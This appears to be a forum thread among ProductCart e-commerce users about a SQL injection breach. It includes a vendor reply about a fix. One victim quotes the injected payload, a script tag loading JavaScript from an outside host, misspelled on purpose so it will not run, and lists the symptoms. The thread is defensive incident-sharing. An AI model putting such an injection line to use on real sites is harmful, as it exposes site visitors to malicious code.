Database Breach

I think another question to be asked is if there were any non-ProductCart scripts in use.  The original poster of this thread got nailed through a vendor page, and not as a result of any ProductCart vulnerability.  Might that be what happened here?

Yes, that is correct. validNum cannot be used on numbers that are not integers. Those numbers are NEVER used in a query as an ID (e.g. a product or category ID is always an integer).

We will send out a new update in the next couple of hours. We believe we have found and fixed the vulnerability. We are just doing some final testing.

Hi all

I have just been attacked with a database SQL insert overnight.

This time it was:
<scrrrript src=http://www.jumpbnr.com/b.js></scrrrrript>

(misspelling of script is deliberate above to avoid any issues).

It's a very similar situation to everyone else with an issue though as you can see to a different site.

Early Impact have been helpful and I have been able to remove it using the SQL insert query they provide.  However it also removed all flash media players from the site too so I'm going back to Friday's backup and having that restored.

As these types of hacks seem to be on the rise here were the symptoms I discovered when viewing the site this morning in case anyone else is hit:
1.  No product cart images were showing up with just the URLs to the images showing.
2.  When the site was loading if I looked at the status bar I could see mention of the jumpbnr.com site which of course shouldn't be there.

I then went to look via MySQL admin and found the string I mentioned with the script inserted into each field.

I thought I was patched already but have reapplied it via FTP just in case.

I will also be investigating HackerSafe as soon as things are back.

Any tips, experiences and thoughts welcome.   As a user community we need to keep on top of this and track all the variants so that each of us is fully aware and can provide the latest advice.

Many kind thanks

cheers
Mark